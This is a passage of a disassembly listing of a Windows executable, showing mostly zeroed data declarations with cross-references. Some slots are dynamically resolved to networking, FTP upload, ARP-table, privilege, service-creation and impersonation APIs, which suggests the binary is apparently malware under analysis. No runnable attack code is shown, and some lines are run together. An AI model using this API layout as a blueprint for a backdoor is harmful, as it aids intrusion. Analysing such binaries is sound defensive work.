dword_454350 dd 0 ; resolved to->WS2_32.send ; sub_401160+17F�r ...
dword_454354 dd 0 ; resolved to->KERNEL32.GetComputerNameA ; sub_4108C7+25�r ...
dword_454358 dd 0 ; resolved to->USER32.CloseClipboard ; sub_40BB43+1EC�r
dword_45435C dd 0 ; sub_40BB43+A10�r
dword_454360 dd 0 ; resolved to->USER32.SendMessageA ; sub_40BB43+1BC�r ...
dword_454364 dd 0 ; sub_418436+E1�r
dword_454368 dd 0 ; resolved to->IPHLPAPI.GetUdpTabledword_45436C dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_40BB43+EC�r
dword_454370 dd 0 ; resolved to->WS2_32.sendto ; sub_40BB43+76F�r ...
dword_454374 dd 0 ; sub_40BB43+B76�r ...
dword_454378 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_418614+80�r ...
dword_45437C dd 0 ; resolved to->ADVAPI32.CreateServiceA ; sub_412EB7+BE�r ...
dword_454380 dd 0 ; resolved to->WININET.FtpPutFileAdword_454384 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_40BB43+29D�r ...
dword_454388 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_45438C dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_40BB43+AD7�r ...
dword_454390 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_40BB43+ACA�r ...
dword_454394 dd 0 ; resolved to->WS2_32.socket ; sub_4016B4+54�r ...
dword_454398 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_40BB43+7BF�r ...
dword_45439C dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_4016B4+14�r ...
dword_4543A0 dd 0 ; sub_40BB43+9E8�r ...
dword_4543A4 dd 0 ; resolved to->WS2_32.accept ; sub_40BB43+65C�w ...
dword_4543A8 dd 0 ; resolved to->WS2_32.shutdown ; sub_41012A+22�r
dword_4543AC dd 0 ; resolved to->WS2_32.closesocket ; sub_4016B4+C3�r ...
dword_4543B0 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_402190+95�r ...
dword_4543B4 dd 0 ; sub_40BB43+B6E�r
dword_4543B8 dd 0 ; resolved to->WS2_32.WSASocketA ; sub_40BB43+6CF�r
dword_4543BC dd 0 ; sub_40BB43+B61�r ...
dword_4543C0 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_40BB43+B7�r ...
dword_4543C4 dd 0 ; resolved to->USER32.DestroyWindow ; sub_40BB43+1D4�r
dword_4543C8 dd 0 ; resolved to->ADVAPI32.ImpersonateLoggedOnUser ; sub_40BB43+467�r ...
dword_4543CC dd 0 ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_40BB43+47F�r ...
dword_4543D0 dd 0 ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA ; sub_4120E9+15F�r
dword_4543D4 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_40BB43+F4�r ...
dword_4543D8 dd 0 dword_4543DC dd 0 dword_4543E0 dd 0 dword_4543E4 dd 0 dword_4543E8 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40BB43:loc_40BE29�w ...
align 10h
dword_4543F0 dd 0 dword_4543F4 dd 0 dword_4543F8 dd 0 dword_4543FC dd 0 ; sub_40BB43+918�w ...
dword_454400 dd 0 dword_454404 dd 0 dword_454408 dd 0 dword_45440C dd 0 dword_454410 dd 0 dword_454414 dd 0 ; sub_40BB43:loc_40C65E�w ...
dd 0
dword_45441C dd 0 dword_454420 dd 0 dword_454424 dd 0 dword_454428 dd 0 dword_45442C dd 0 dword_454430 dd 0 ; sub_40BB43+C63�w
dword_454434 dd 0 dword_454438 dd 0 ; sub_415DBD:loc_415E3D�r
dword_45443C dd 0 dword_454440 dd 0 dword_454444 dd 0 dword_454448 dd 0 dword_45444C dd 0 dword_454450 dd 0 ; sub_40FA20+94�r ...
align 8
dword_454458 dd 4 dup(0) dword_454468 dd 4 dup(0) byte_454478 db 0 ; DATA XREF: sub_410930+B�o
; sub_410930+5A�w
align 4
dd 3 dup(0)
dword_454488 dd 4 dup(0) dword_454498 dd 4 dup(0) dword_4544A8 dd 0 byte_4544AC db 0 ; DATA XREF: sub_4108C7+A�o
; sub_4108C7+2B�r
align 10h
dd 3 dup(0)
dword_4544BC dd 4 dup(0) byte_4544CC db 0 ; DATA XREF: sub_410882+5�o
; sub_410882+2C�w ...
align 10h
dd 3 dup(0)
byte_4544DC db 0 ; DATA XREF: sub_41099D+10�o
; sub_41099D+107�w
align 10h
dd 3 dup(0)
dword_4544EC dd 4 dup(0) dword_4544FC dd 4 dup(0) dword_45450C dd 0 ; sub_40FFB4+B3�w ...
dword_454510 dd 0 ; sub_40FCF7+35�r ...
align 10h
dword_454520 dd 0 ; sub_40FDC0+1�o ...
align 10h
dword_454530 dd 0 ; sub_40FE00+35�r
dd 86h dup(0)
db 0
byte_45474D db 3 dup(0) ; DATA XREF: sub_40FCF7+13�o
; sub_40FD55+4E�o ...
dword_454750 dd 0 ; sub_412069+A�o ...
dd 2 dup(0)
db 0
byte_45475D db 3 dup(0) ; DATA XREF: sub_40FDC0+36�o
dd 2 dup(0)
dword_454768 dd 0 ; sub_412069+60�r
dd 1A5h dup(0)
dword_454E00 dd 134h dup(0) dword_4552D0 dd 4 dup(0) ; sub_4016B4+C�o ...
dword_4552E0 dd 0 align 8
dword_4552E8 dd 28h dup(0) ; sub_418F30:loc_419079�o
dword_455388 dd 4 dup(0) ; sub_4016B4+2A�o ...
dword_455398 dd 0 dword_45539C dd 0 ; sub_412267+492�w ...
dword_4553A0 dd 0 align 8
dword_4553A8 dd 42h dup(0) ; sub_41B69D+60�o
dword_4554B0 dd 10h dup(0) ; .text:loc_41205F�o ...
dword_4554F0 dd 0 align 8
dword_4554F8 dd 40h dup(0) dword_4555F8 dd 0 dword_4555FC dd 0 ; sub_41F455+C0�r
dword_455600 dd 0 ; sub_403B2C:loc_405497�r
align 8
byte_455608 db 0 ; DATA XREF: sub_41A0E6+56�o
; sub_41D499+1F7�o
byte_455609 db 3 dup(0) ; DATA XREF: sub_41A15F+23�o
; sub_41D499+20F�o
dword_45560C dd 0 ; sub_4128D4+2E5�o
dword_455610 dd 123h dup(0) ; sub_41391C+3B4�o ...
dword_455A9C dd 0 ; sub_41391C+49A�o
dd 4 dup(0)
dword_455AB0 dd 0 ; sub_416F48+12D�r ...
align 8
byte_455AB8 db 0 ; DATA XREF: sub_416B4C+66�o
; sub_4170D5+28�o ...
align 4
dd 0FFh dup(0)
dword_455EB8 dd 0 ; sub_4143AB+58�r ...
dword_455EBC dd 0 ; sub_4176B1+28�r
dword_455EC0 dd 0 ; sub_4143AB+3B�r ...
dword_455EC4 dd 0 ; sub_4174BE+1F�r ...
dword_455EC8 dd 0 ; sub_416F48+15A�r ...
dword_455ECC dd 0 ; sub_4156F3+9�o
dword_455ED0 dd 0 ; sub_416F48+152�r ...
dword_455ED4 dd 0 ; sub_414508+8D�o
dword_455ED8 dd 0 ; sub_414508+121�w
dword_455EDC dd 0 ; sub_4143AB+F3�r ...
dd 4 dup(0)
dword_455EF0 dd 0Dh dup(0) ; sub_414508:loc_414647�o
dword_455F24 dd 0 ; sub_416F48+13A�r ...
dword_455F28 dd 0 ; sub_416F48+14A�r ...
dword_455F2C dd 0 ; sub_416F48+142�r ...
byte_455F30 db 0 ; DATA XREF: sub_417583+21�o
; sub_417583+45�r
align 4
dd 0A01h dup(0)
dword_458738 dd 0 ; sub_415EA7+11B�o ...
dd 18h dup(0)
byte_45879C db 0 ; DATA XREF: sub_415EA7+1D5�w
; sub_415EA7+30E�w ...
align 10h
dd 18h dup(0)
dword_458800 dd 0 ; sub_415EA7+270�o ...
dd 0E73h dup(0)
dword_45C1D0 dd 0 ; sub_415EA7+131�r ...
dword_45C1D4 dd 0 ; sub_4170D5+1C�w ...
dword_45C1D8 dd 0 ; sub_416F48+71�w ...
dword_45C1DC dd 0 ; sub_416F48+40�w ...
dword_45C1E0 dd 0 dword_45C1E4 dd 0 ; sub_417583+5�r ...
dword_45C1E8 dd 0 dword_45C1EC dd 0 ; sub_417583+D�r
dword_45C1F0 dd 4Eh dup(0) ; sub_417989+4C�o
dword_45C328 dd 20h dup(0) dword_45C3A8 dd 0 ; sub_417A90:loc_417B2E�r
dword_45C3AC dd 0Dh dup(0) dword_45C3E0 dd 0 ; sub_41A829+5E�w ...
dd 4000h dup(0)
dword_46C3E4 dd 0 ; sub_41B424+63�r ...
dword_46C3E8 dd 0 ; sub_41B387+50�w
dword_46C3EC dd 0 ; sub_41B387+8�w ...
dword_46C3F0 dd 0 ; sub_41B387+1C�w ...
dword_46C3F4 dd 0 dword_46C3F8 dd 0 dword_46C3FC dd 0 dword_46C400 dd 0 ; sub_41B387+5B�w
dword_46C404 dd 0 ; sub_41B387+61�w
dword_46C408 dd 0 ; sub_41BED7+27�o ...
dd 3FFh dup(0)
dword_46D408 dd 0 ; sub_41BED7+75�w ...
dword_46D40C dd 0 ; sub_401906+47�r ...
dword_46D410 dd 0 ; sub_414508+16B�w ...
dword_46D414 dd 0 ; sub_40178D+FC�w ...
dword_46D418 dd 0 ; sub_41C059+24�w
dword_46D41C dd 0 ; sub_41C059+2A�w
dd 0B0Bh dup(0)
db 3 dup(0)
byte_47004F db 0 ; DATA XREF: .text:00447374�o
dd 7FFFh dup(0)
db 0
byte_49004D db 3 dup(0) ; DATA XREF: .text:004473D0�o
; .text:00447584�o
dword_490050 dd 0C001h dup(0)dword_4C0054 dd 563Fh dup(0) db 3 dup(0)
byte_4D5953 db 0 ; DATA XREF: .text:off_441A58�o
dd 29BDh dup(0)
db 0
byte_4E0049 db 3 dup(0) ; DATA XREF: .text:004473E0�o
; .text:00447574�o
db 3 dup(0)
byte_4E004F db 0 ; DATA XREF: .text:00447378�o
dd 103Fh dup(0)
dword_4E414C dd 202h dup(0) db 3 dup(0)
byte_4E4957 db 0 ; DATA XREF: .text:off_4388B8�o
dd 27Ah dup(0)
db 0
byte_4E5341 db 3 dup(0) ; DATA XREF: .text:off_441A2C�o
dd 6B2Eh dup(0)
db 3 dup(0)
byte_4FFFFF db 0 ; DATA XREF: sub_417A90+1B5�o
dd 12h dup(0)
db 0
byte_500049 db 3 dup(0) ; DATA XREF: .text:off_4473C0�o
; .text:off_447590�o
dword_50004C dd 1102h dup(0) db 0
byte_504455 db 3 dup(0) ; DATA XREF: .text:off_434CCC�o
dd 6EFAh dup(0)
db 2 dup(0)
word_520042 dw 0 ; DATA XREF: .text:off_4473A0�o
align 10h
dword_520050 dd 0 ; .text:off_447570�o
dword_520054 dd 4933h dup(0) dword_532520 dd 47CCh dup(0) dword_544450 dd 3C0h dup(0) dword_545350 dd 3C3Dh dup(0) db 0
byte_554445 db 3 dup(0) ; DATA XREF: .text:0043D1CC�o
dd 1C0h dup(0)
dword_554B48 dd 6D41h dup(0) db 3 dup(0)
byte_57004F db 0 ; DATA XREF: .text:004473A4�o
dd 3FFDh dup(0)
db 2 dup(0)
word_580046 dw 0 ; DATA XREF: .text:off_436A28�o
; .text:00436A30�o ...
dd 53BEh dup(0)
db 2 dup(0)
word_594F42 dw 0 ; DATA XREF: .text:off_4337A8�o
dd 0AC38h dup(0)
dword_5C0024 dd 7 dup(0) db 3 dup(0)
byte_5C0043 db 0 ; DATA XREF: .text:004473C4�o
dd 2 dup(0)
db 2 dup(0)
word_5C004E dw 0 ; DATA XREF: .text:004473D4�o
db 2 dup(0)
word_5C0052 dw 0 ; DATA XREF: .text:004473AC�o
; .text:004473E8�o
dd 0E7Bh dup(0)
db 0
byte_5C3A41 db 3 dup(0) ; DATA XREF: .text:off_43E640�o
dd 0CCFEh dup(0)
db 3 dup(0)
byte_5F6E3F db 0 ; DATA XREF: .text:off_43B54B�o
dd 387h dup(0)
db 3 dup(0)
byte_5F7C5F db 0 ; DATA XREF: .text:off_4337D8�o
dd 6128h dup(0)
dword_610100 dd 1818h dup(0) db 0
byte_616161 db 3 dup(0) ; DATA XREF: .text:off_43D50C�o
dd 72h dup(0)
db 2 dup(0)
word_61632E dw 0 ; DATA XREF: .text:off_442590�o
dd 14Ch dup(0)
db 0
byte_616861 db 3 dup(0) ; DATA XREF: .text:off_43378C�o
dd 132h dup(0)
db 2 dup(0)
word_616D2E dw 0 ; DATA XREF: .text:off_44240C�o
dd 17Fh dup(0)
db 2 dup(0)
word_61732E dw 0 ; DATA XREF: .text:off_442378�o
dd 7Fh dup(0)
db 2 dup(0)
word_61752E dw 0 ; DATA XREF: .text:off_4422DC�o
dd 13Fh dup(0)
db 2 dup(0)
word_617A2E dw 0 ; DATA XREF: .text:off_4422CC�o
dd 2C50h dup(0)
db 2 dup(0)
word_622B72 dw 0 ; DATA XREF: .text:off_448FE4�o
dd 38B1h dup(0)
dword_630E38 dd 0Eh dup(0) ; sub_41BFDA+24�o ...
dword_630E70 dd 100h dup(0) dword_631270 dd 0 ; sub_41FB50:loc_41FCAF�w
dd 11h dup(0)
dword_6312B8 dd 0 ; sub_420BEE+449�w ...
align 10h
byte_6312C0 db 0 ; DATA XREF: .text:00420A58�o
; .text:00420ACA�r ...
align 4
dd 3Fh dup(0)
dword_6313C0 dd 3 dup(0) dword_6313CC dd 0 dword_6313D0 dd 0 ; sub_4241D4+A4�w
align 8
word_6313D8 dw 0 ; DATA XREF: sub_4241D4+55�r
; sub_4241D4+9A�o
word_6313DA dw 0 ; DATA XREF: sub_4241D4+48�r
db 2 dup(0)
word_6313DE dw 0 ; DATA XREF: sub_4241D4+3B�r
word_6313E0 dw 0 ; DATA XREF: sub_4241D4+2E�r
word_6313E2 dw 0 ; DATA XREF: sub_4241D4+21�r
align 8
dword_6313E8 dd 0 ; sub_42A86B:loc_42A894�w ...
dword_6313EC dd 0 ; sub_42B22D:loc_42B23F�r ...
dd 0
dword_6313F4 dd 0 dword_6313F8 dd 0 ; sub_423F63+104�r ...
dword_6313FC dd 0 dword_631400 dd 0 ; sub_427FF3+2D�w ...
align 8
dword_631408 dd 6 dup(0) dword_631420 dd 6 dup(0) dword_631438 dd 6 dup(0) dword_631450 dd 6 dup(0) dword_631468 dd 0 byte_63146C db 0 ; DATA XREF: .text:00424F15�w
byte_63146D db 0 ; DATA XREF: sub_423517:loc_42358D�r
align 10h
dword_631470 dd 0 dword_631474 dd 0 dword_631478 dd 0 dword_63147C dd 0 dword_631480 dd 0 align 8
dword_631488 dd 0 ; sub_4291A8+27�r ...
dword_63148C dd 0 dword_631490 dd 0 ; sub_42CEF8+4�r ...
align 8
dword_631498 dd 0 align 10h
byte_6314A0 db 0 ; DATA XREF: sub_424828+5�r
; sub_4284FB+32�w
align 4
dword_6314A4 dd 0 dword_6314A8 dd 0 ; sub_4284FB+97�w
dword_6314AC dd 0 ; sub_429B43+38�r ...
dword_6314B0 dd 0 ; sub_429BA7+4C�w ...
align 10h
dword_6314C0 dd 2 dup(0) ; .text:0042E7C7�o
dword_6314C8 dd 0 ; sub_4240A0:loc_42410D�r ...
dd 3 dup(0)
dword_6314D8 dd 0 ; sub_424DC3+C0�r ...
align 10h
dword_6314E0 dd 0 align 8
dword_6314E8 dd 0 ; sub_42AB0B+4�w ...
dword_6314EC dd 41h dup(0) dword_6315F0 dd 0 ; sub_42B533+23�w ...
dword_6315F4 dd 0 dword_6315F8 dd 0 ; sub_42BADD:loc_42BB47�w
dword_6315FC dd 0 dd 1Ah dup(0)
dword_631668 dd 0 ; sub_42D078+7A�w ...
align 10h
dword_631670 dd 0 ; sub_42D078+5D�r
dword_631674 dd 10h dup(0) word_6316B4 dw 0 ; DATA XREF: sub_42D320+A8�r
word_6316B6 dw 0 ; DATA XREF: sub_42D078+6B�r
; sub_42D320+DB�r ...
word_6316B8 dw 0 ; DATA XREF: sub_42D320+CA�r
word_6316BA dw 0 ; DATA XREF: sub_42D320+D3�r
; sub_42D320:loc_42D412�r
word_6316BC dw 0 ; DATA XREF: sub_42D320+C0�r
word_6316BE dw 0 ; DATA XREF: sub_42D320+B8�r
word_6316C0 dw 0 ; DATA XREF: sub_42D320+B0�r
word_6316C2 dw 0 ; DATA XREF: sub_42D320+9E�r
dword_6316C4 dd 0 dword_6316C8 dd 10h dup(0) word_631708 dw 0 ; DATA XREF: sub_42D320+46�r
word_63170A dw 0 ; DATA XREF: sub_42D078:loc_42D106�r
; sub_42D320+78�r ...
word_63170C dw 0 ; DATA XREF: sub_42D320+67�r
word_63170E dw 0 ; DATA XREF: sub_42D320+70�r
; sub_42D320:loc_42D3A4�r
word_631710 dw 0 ; DATA XREF: sub_42D320+5D�r
word_631712 dw 0 ; DATA XREF: sub_42D320+55�r
word_631714 dw 0 ; DATA XREF: sub_42D320+4D�r
word_631716 dw 0 ; DATA XREF: sub_42D320+3E�r
dword_631718 dd 0 dword_63171C dd 0 ; sub_42D078:loc_42D1D9�r ...
dword_631720 dd 0 ; sub_42D04A+10�r ...
dword_631724 dd 0 ; resolved to->USER32.MessageBoxA ; sub_42D64E+2E�w ...
dword_631728 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_42D64E:loc_42D69D�r
dword_63172C dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_42D64E+60�r
dword_631730 dd 0 dword_631734 dd 0 ; sub_42D7FC+81�o
dword_631738 dd 0 ; sub_42D7FC+4A�o
dword_63173C dd 0 ; sub_42D7FC+3D�o
dword_631740 dd 0 ; sub_42D7FC+57�o
align 8
dword_631748 dd 0 ; sub_42E2C0+48�w ...
dd 2 dup(0)
dword_631754 dd 4 dup(0) ; .text:0044C1F8�o ...
byte_631764 db 0 ; DATA XREF: .text:loc_40321E�r
; .text:00403227�w ...
byte_631765 db 0 ; DATA XREF: sub_421D6B+6F�r
; sub_421D6B+78�w
align 4
dword_631768 dd 0 ; sub_42A95E+79�w ...
align 10h
dword_631770 dd 3 dup(0) ; sub_42A95E+179�o ...
dword_63177C dd 0 ; sub_42A95E+168�w ...
byte_631780 db 0 ; DATA XREF: sub_42ABB1:loc_42ACBD�w
; sub_42ABB1:loc_42ACDA�w ...
align 4
dd 3Fh dup(0)
byte_631880 db 0 ; DATA XREF: sub_42A95E+6E�o
; sub_42A95E+BE�o ...
byte_631881 db 0 ; DATA XREF: sub_4245FD+5D�r
; sub_42A95E+AB�w ...
align 4
dd 40h dup(0)
dword_631984 dd 0 ; sub_42A95E+137�w ...
dword_631988 dd 0 ; sub_424380+5A�r ...
dword_63198C dd 0 ; sub_424380:loc_4243D3�w ...
dword_631990 dd 0 ; sub_42B22D+AD�w
dword_631994 dd 0 ; sub_42AD36+11�w ...
dword_631998 dd 0 ; sub_42319C:loc_4231E5�r ...
dword_63199C dd 0 ; sub_42319C+11�r ...
dword_6319A0 dd 0 ; sub_42789E+5�r ...
dword_6319A4 dd 0 ; sub_42726C+25A�r ...
dword_6319A8 dd 0 ; sub_42726C+311�w ...
dword_6319AC dd 0 ; sub_42726C+22D�r ...
dword_6319B0 dd 0 ; sub_427241�r ...
dword_6319B4 dd 0 ; sub_427241+8�r ...
dword_6319B8 dd 0 ; sub_423F63+64�r ...
dword_6319BC dd 0 ; sub_4230B3+CE�r ...
dword_6319C0 dd 0 ; sub_4230B3+2E�r ...
dd 7 dup(0)
dword_6319E0 dd 0 ; sub_424780+81�r ...
dword_6319E4 dd 3Fh dup(0) dword_631AE0 dd 0 ; sub_426902+5�r ...
dword_631AE4 dd 0 ; sub_42B1D5+F�r ...
dword_631AE8 dd 0 ; sub_424780+41�w ...
dd 5 dup(0)
dword_631B00 dd 0CEh dup(0) ; .text:00449438�o
dword_631E38 dd 0 ; sub_41C254+19�o
dword_631E3C dd 331h dup(0) dword_632B00 dd 0 ; sub_424780:loc_42479A�w ...
dd 1C7h dup(0)
db 3 dup(0)
byte_633223 db 0 ; DATA XREF: .text:off_43EC8C�o
align 1000h
_text ends
; Section 3. (virtual address 00236000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00236000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 636000h
dd 4Bh dup(0)
db 2 dup(0)
word_63612E dw 0 ; DATA XREF: .text:off_4425E8�o
dd 34h dup(0)
dd 18h dup(?)
db ?
byte_636261 db 3 dup(?) ; DATA XREF: .text:off_43D30C�o
dd 32h dup(?)
db 2 dup(?)
word_63632E dw ? ; DATA XREF: .text:off_44258C�o
dd 0Fh dup(?)
db ?
byte_63636D db 3 dup(?) ; DATA XREF: .text:off_4337F8�o
dd 75h dup(?)
dword_636544 dd 3 dup(?) db 3 dup(?)
byte_636553 db ? ; DATA XREF: .text:off_434A64�o
dd 248h dup(?)
db 2 dup(?)
word_636E76 dw ? ; DATA XREF: .text:off_43CF04�o
align 200h
_idata2 ends
end start